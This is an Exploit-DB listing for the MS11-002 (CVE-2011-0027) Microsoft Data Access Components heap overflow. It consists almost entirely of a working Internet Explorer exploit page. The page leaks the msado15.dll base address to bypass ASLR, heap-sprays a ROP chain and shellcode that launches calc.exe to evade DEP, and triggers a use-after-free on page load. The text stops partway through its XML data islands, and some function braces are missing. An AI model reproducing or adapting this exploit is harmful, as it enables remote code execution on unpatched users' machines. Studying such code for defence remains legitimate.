MS11-002: Microsoft Data Access Components Vulnerability(MS11-002:Microsoft 数据访问组件中的漏洞)
EDB-ID: 15984
CVE: 2011-0027
OSVDB-ID: N/A
Author: Peter Vreugdenhil
Published: 2011-01-12
Verified: √
Exploit Code: Vulnerable
App: N/A
From: http://www.exploit-db.com/exploits/15984/

Code:

view sourceprint?<html xmlns:t = "urn:schemas-microsoft-com:time"> 

  <head> 

  <meta name="License" content="Q Public License;http://en.wikipedia.org/wiki/Q_Public_License"> 

    <style> 

      .body { 

        

      } 

      #test { 

      

      } 

    </style> 

    <script src="heapLib.js"></script> 

    <script> 

    // This code has been released under the Q Public License by Trolltech 

    // http://en.wikipedia.org/wiki/Q_Public_License 

    // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/ 

  

  

var StartTime = new Date();     

var FinalHeapSpraySize = 900; 

//var SmallHoleSize = 0x1F0; 

var SmallHoleSize = 0x240; 

var GlobalRowCounter = 0; 

    

var localxmlid1; 

var localxmlid2;     

var localxmlid3;     

var localxmlid5;   

var adobase = 0; 

var finalspray = ''; 

var heap = null; 

var ExpoitTime = 10; 

var CurrentHeapSpraySize = 0; 

  

  

function Start() { 

    FaseOne(); 

  

  

  

function FaseOne() { 

  

  localxmlid1 = document.getElementById('xmlid1').recordset;     

  localxmlid2 = document.getElementById('xmlid2').recordset;     

  localxmlid3 = document.getElementById('xmlid3').recordset;     

  localxmlid5 = document.getElementById('xmlid5').recordset;     

    

  localxmlid2.CacheSize = 0x40000358; 

    

  localxmlid1.CacheSize = SmallHoleSize;;   //small hole? 

  localxmlid1.AddNew(["AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"], ["c"]);  

  localxmlid5.AddNew(["BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB"], ["c"]);  

    

    

  var my1field = localxmlid5.Fields.Item(0); 

  localxmlid1.MoveFirst(); 

    

  localxmlid2.AddNew(["BBBB"], ["c"]);   

    

  localxmlid1.Close(); 

  CollectGarbage(); 

    

  localxmlid3.MoveFirst(); 

    

  void(Math.atan2(0xbabe, ('###################### 2 Move First').toString())); 

  localxmlid2.MoveFirst(); 

  

  void(Math.atan2(0xbabe, ('###################### 5 Move First').toString())); 

  localxmlid5.CacheSize = 0x40000008; 

  localxmlid5.MoveFirst(); 

  localxmlid3.AddNew(["MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong"], ["cccccuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuuFINDMEccccc"]);  

  

  var localxmlid4 = document.getElementById('xmlid4').recordset;     

  

  localxmlid4.AddNew(["bb"], ["c"]);  

  

  localxmlid4.MoveNext();   

    

    

  var localxmlid6 = document.getElementById('xmlid6').recordset;  

  localxmlid6.AddNew(["CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC"], ["c"]);   

    

  localxmlid2.MoveFirst(); 

    

  Math.tan(1); 

    

  document.getElementById('textfaseone').innerText = 'Setting up data for ASLR evasion:'; 

  if(GlobalRowCounter < 0x10120) { 

    window.setTimeout(IncreaseRowCounter, 100); 

  } 

  

  

function IncreaseRowCounter() { 

    //alert('IncreaseRowCounter: ' + GlobalRowCounter) 

    if(GlobalRowCounter < 0x10120) {      

    for(i = 0; i < 0x300; i++) {          

        GlobalRowCounter++; 

      localxmlid2.AddNew(["BBBB"], ["c"]);  

      localxmlid2.Delete(); 

    } 

    var percentcomplete = Math.round(GlobalRowCounter /0x10120 * 100); 

    document.getElementById('progressfaseone').innerText = percentcomplete + "%"; 

    window.setTimeout(IncreaseRowCounter, 100); 

  } 

  else { 

    document.getElementById('textfaseonedone').innerText = 'Now searching memory for suitable vtable. Please wait...'; 

    window.setTimeout(FindADOBase, 100); 

  } 

  

function FindADOBase() { 

    //alert('FindADOBase'); 

    

      

  var myfield = localxmlid3.Fields.Item(1); 

  

    for(i = 0; i < 0xDF6; i++) { 

      localxmlid2.AddNew(["BBBB"], ["c"]);  

      localxmlid2.MoveFirst(); 

      if(myfield.Name != "MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong") { 

        break; 

      } 

    } 

    //alert('done first'); 

  

  void(Math.atan2(0xbabe, ('###################### Add untill vftable 2').toString())); 

    

  var vftable1 = null; 

  var vftable2 = null; 

    

    for(i = 0; i < 0xAE0; i++) { 

        void(Math.atan2(0xbabe, ('add row: ' + i).toString())); 

      localxmlid2.AddNew(["BBBB"], ["c"]);  

      localxmlid2.MoveFirst(); 

      //if(i > 10) { 

      //  document.forms[0].myresult.value += i.toString(16) + " : " + escape(myfield.name.substr((2 * i) + 4, 8)) + " : "  + myfield.name.length + "\n"; 

      //} 

      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uAD68/)) { 

        vftable1 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1"); 

      }       

      if(escape(myfield.name.substr((2 * i) + 4, 2)).match(/uD738/)) { 

        vftable2 = escape(myfield.name.substr((2 * i) + 4, 2)).replace(/%u(\w\w\w\w)%u(\w\w\w\w)/, "$2$1"); 

      }   

      if(vftable1  && vftable2) { 

        break; 

      } 

    } 

   //document.forms[0].myresult.value += "\n\nVFTABLES: " + vftable1 + " : " + vftable2 + "\n\n\n"; 

   //alert(vftable1); 

   if((parseInt(vftable1,16) - 0x1AD68) == (parseInt(vftable2,16) - 0xD738)) {        

     adobase = parseInt(vftable1,16) - 0x1AD68; 

     document.getElementById('textfoundaddress').innerText = 'Found base address of <censored>.dll: 0x<censored>';// + adobase.toString(16); 

     FaseTwo(); 

   } 

   else { 

     alert('sadly we failed to read the base address of msado15.dll :( ');   

   } 

     

}     

  

function FaseTwo() {     

    document.getElementById('textfasetwo').innerText = 'Setting up heap for DEP evasion:'; 

    document.getElementById('progressfasetwo').innerText = '0%'; 

  heap = new heapLib.ie(0x20000); 

  

        

  var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123" + MakeAddressString(adobase)  + "%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F" +  

                  "%u9090%u9090%u868B%u1108%u0000%u5056%u056A%uA068%u0421%u0516%u185E%u0008%uD0FF%u5058%u0590%u0BBB%u0000%uD0FF%uF88B%u0558%u3B47%u0000%u006A%uFF57%uCCD0" + "%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF" +                                     

                  "%u6163%u636C%u652E%u6578%u0000%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578%u0000%u0000" + "%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF"); 

                  //"%u6163%u636C%u652D%u6578%u0000 

                 //%u3A63%u775C%u6E69%u6F64%u7377%u735C%u7379%u6574%u336D%u5C32%u6163%u636C%u652E%u6578 

                 //c:\windows\system32\calc.exe 

                 //%63%61%6C%63%2E%65%78%65 

                 //%63%3A%5C%77%69%6E%64%6F%77%73%5C%73%79%73%74%65%6D%33%32%5C%63%61%6C%63%2E%65%78%65     

                    

  //var heapspray = unescape("%u2020%u1604%u0102%u0103%u0104%u0105" + MakeAddressString(adobase + 0x117C3) + MakeAddressString(adobase + 0x1188 - 0x1C) + "%u010A%u010B" + MakeAddressString(adobase + 0x4270B) + "%u010E%u010F%u0110%u0111%u0112%u0113" + "%u2100%u1604" + "%u0116%u0117%u0118%u0119%u011A%u011B%u011C%u011D%u011E%u011F%u0120%u0121%u0122%u0123%u0124%u0125%u0126%u0127%u0128%u0129%u012A%u012B" + "%u2024%u1604" + "%u012E%u012F%u0130%u0131%u0132%u0133" + "%u0040%u0000" + "%u0136%u0137" + MakeAddressString(adobase + 0x1B1F0)  + "%u013A%u013B" + "%u0200%u0000" + "%u013E%u013F" + "%u2030%u1604" + "%u0142%u0143%u0144%u0145%u0146%u0147%u0148%u0149%u014A%u014B%u014C%u014D%u014E%u014F%u0150%u0151%u0152%u0153%u0154%u0155%u0156%u0157%u0158%u0159%u015A%u015B%u015C%u015D%u015E%u015F%u0160%u0161%u0162%u0163%u0164%u0165%u0166%u0167%u0168%u0169%u016A%u016B%u016C%u016D%u016E%u016F%u0170%u0171%u0172%u0173%u0174%u0175%u0176%u0177%u0178%u0179%u017A%u017B%u017C%u017D%u017E%u017F%u0180%u0181%u0182%u0183%u0184%u0185%u0186%u0187%u0188%u0189%u018A%u018B%u018C%u018D%u018E%u018F%u0190%u0191%u0192%u0193%u0194%u0195%u0196%u0197%u0198%u0199%u019A%u019B%u019C%u019D%u019E%u019F%u01A0%u01A1%u01A2%u01A3%u01A4%u01A5%u01A6%u01A7%u01A8%u01A9%u01AA%u01AB%u01AC%u01AD%u01AE%u01AF%u01B0%u01B1%u01B2%u01B3%u01B4%u01B5%u01B6%u01B7%u01B8%u01B9%u01BA%u01BB%u01BC%u01BD%u01BE%u01BF%u01C0%u01C1%u01C2%u01C3%u01C4%u01C5%u01C6%u01C7%u01C8%u01C9%u01CA%u01CB%u01CC%u01CD%u01CE%u01CF%u01D0%u01D1%u01D2%u01D3%u01D4%u01D5%u01D6%u01D7%u01D8%u01D9%u01DA%u01DB%u01DC%u01DD%u01DE%u01DF%u01E0%u01E1%u01E2%u01E3%u01E4%u01E5%u01E6%u01E7%u01E8%u01E9%u01EA%u01EB%u01EC%u01ED%u01EE%u01EF" + "%u20A0%u1604" + "%u01F2%u01F3%u01F4%u01F5%u01F6%u01F7%u01F8%u01F9%u01FA%u01FB%u01FC%u01FD%u01FE%u01FF%u0200%u0201%u0202%u0203%u0204%u0205%u0206%u0207%u0208%u0209%u020A%u020B%u020C%u020D%u020E%u020F%u0210%u0211%u0212%u0213%u0214%u0215%u0216%u0217%u0218%u0219%u021A%u021B%u021C%u021D%u021E%u021F%u0220%u0221%u0222%u0223%u0224%u0225%u0226%u0227%u0228%u0229%u022A%u022B%u022C%u022D%u022E%u022F%u0230%u0231%u0232%u0233%u0234%u0235%u0236%u0237%u0238%u0239%u023A%u023B%u023C%u023D%u023E%u023F%u0240%u0241%u0242%u0243%u0244%u0245%u0246%u0247%u0248%u0249%u024A%u024B%u024C%u024D%u024E%u024F%u0250%u0251%u0252%u0253%u0254%u0255%u0256%u0257%u0258%u0259%u025A%u025B%u025C%u025D%u025E%u025F%u0260%u0261%u0262%u0263%u0264%u0265%u0266%u0267%u0268%u0269%u026A%u026B%u026C%u026D%u026E%u026F%u0270%u0271%u0272%u0273%u0274%u0275%u0276%u0277%u0278%u0279%u027A%u027B%u027C%u027D%u027E%u027F%u0280%u0281%u0282%u0283%u0284%u0285%u0286%u0287%u0288%u0289%u028A%u028B%u028C%u028D%u028E%u028F%u0290%u0291%u0292%u0293%u0294%u0295%u0296%u0297%u0298%u0299%u029A%u029B%u029C%u029D%u029E%u029F%u02A0%u02A1%u02A2%u02A3%u02A4%u02A5%u02A6%u02A7%u02A8%u02A9%u02AA%u02AB%u02AC%u02AD%u02AE%u02AF%u02B0%u02B1%u02B2%u02B3%u02B4%u02B5%u02B6%u02B7%u02B8%u02B9%u02BA%u02BB%u02BC%u02BD%u02BE%u02BF%u02C0%u02C1%u02C2%u02C3%u02C4%u02C5%u02C6%u02C7%u02C8%u02C9%u02CA%u02CB%u02CC%u02CD%u02CE%u02CF%u02D0%u02D1%u02D2%u02D3%u02D4%u02D5%u02D6%u02D7%u02D8%u02D9%u02DA%u02DB%u02DC%u02DD%u02DE%u02DF%u02E0%u02E1%u02E2%u02E3%u02E4%u02E5%u02E6%u02E7%u02E8%u02E9%u02EA%u02EB%u02EC%u02ED%u02EE%u02EF%u02F0%u02F1%u02F2%u02F3%u02F4%u02F5%u02F6%u02F7%u02F8%u02F9%u02FA%u02FB%u02FC%u02FD%u02FE%u02FF"); 

  

  while(heapspray.length < 0x200) heapspray += unescape("%u4444"); 

  

  var heapblock = heapspray; 

  while(heapblock.length < 0x40000) heapblock += heapblock; 

  finalspray = heapblock.substring(2, 0x40000 - 0x21); 

  

  //alert('Base address of ado15.dll ' + adobase.toString(16)); 

  if(CurrentHeapSpraySize < 900) { 

    window.setTimeout(SprayHeap, 100); 

  } 

  else { 

    RunExploit(); 

  } 

  

function SprayHeap() { 

  if(CurrentHeapSpraySize < FinalHeapSpraySize - 1) { 

    for(var i = 0; i < 90; i++) { 

      heap.alloc(finalspray); 

      CurrentHeapSpraySize++; 

    } 

    var percentcomplete = Math.round(CurrentHeapSpraySize /FinalHeapSpraySize * 100); 

    document.getElementById('progressfasetwo').innerText = percentcomplete + "%";     

    window.setTimeout(SprayHeap, 100); 

  }   

    else { 

        document.getElementById('textfasetwodone').innerText = "Ready to start calc.exe in: ";     

        window.setTimeout(RunExploitTimer, 100); 

    } 

      

  

function RunExploitTimer() { 

    if(ExpoitTime > 0) { 

        document.getElementById('countexploitrun').innerText = ExpoitTime; 

        window.setTimeout(RunExploitTimer, 500); 

        ExpoitTime--; 

    } 

    else { 

        document.getElementById('countexploitrun').innerText = 0;    

        var EndTime = new Date(); 

      var TotalRun = Math.round((EndTime.getTime() - StartTime.getTime()) / 1000); 

      document.getElementById('totalruntime').innerText = "Total exploitation time: " + TotalRun + " seconds";   

        window.setTimeout(RunExploit, 100); 

    } 

      

function RunExploit() { 

   

  var elms = new Array(); 

  for(i =0; i < 100; i++) { 

      elms.push(document.createElement('div')); 

  } 

  

  owningObj = document.styleSheets[0].owningElement;   

  

  myimports = document.styleSheets[0].imports; 

  

  document.appendChild(owningObj); 

  document.removeChild(owningObj); 

  

  owningObj.outerHTML = 'a'; 

  

  Math.atan2(0xbabe, "Collect"); 

  CollectGarbage(); 

  

  Math.atan2(0xbabe, "spray"); 

  for(i = 0; i < 100; i++) { 

    elms[i].className = unescape("%u4140%u4141%u4142%u4143%u4144%u4145%u4146%u4147%u4148%u4149%u414a%u414b%u414c%u414d%u414e%u414f%u4151%u4152%u4153%u4154%u2020%u1604%u2020%u1604%u4159%u415a%u415b"); 

  }    

  

  Result = owningObj.insertAdjacentElement(myimports,'a'); 

   

      

}     

  

function MakeAddressString(addrint) { 

    //First, turn into hex: 

    var addstr = addrint.toString(16); 

    //Split and swap 

    addstr = addstr.replace(/(\w\w\w\w)(\w\w\w\w)/,"%u$2%u$1"); 

    return addstr; 

      

    </script> 

  

  </head> 

  <body onLoad="window.setTimeout(Start,100);" id="bodyid"> 

  <div> 

    <h2 id="textfaseone"></h2> 

    <br> 

    <h2 id="progressfaseone"></h2> 

    <br> 

    <h2 id="textfaseonedone"></h2> 

    <br> 

    <h2 id="textfoundaddress"></h2> 

    <br> 

    <h2 id="textfasetwo"></h2> 

    <br> 

    <h2 id="progressfasetwo"></h2> 

    <br> 

    <h2 id="textfasetwodone"></h2> 

    <br> 

    <h2 id="countexploitrun"></h2> 

    <br> 

    <h2 id="totalruntime"></h2> 

  </div> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid1"> 

<Devices> 

<Device> 

<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid2"> 

<Devices> 

<Device> 

<BBBB /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid3"> 

<root> 

<data> 

    <SmallData> 

  </SmallData> 

<MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong> 

    value1 

</MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLong> 

</data> 

</root> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid4"> 

<Devices> 

<Device> 

<bb /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid5"> 

<Devices> 

<Device> 

<BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB /> 

</Device> 

</Devices> 

</XML> 

  

<?xml version="1.0" encoding="utf-8" standalone="yes"?> 

<XML ID="xmlid6"> 

<root> 

<data> 

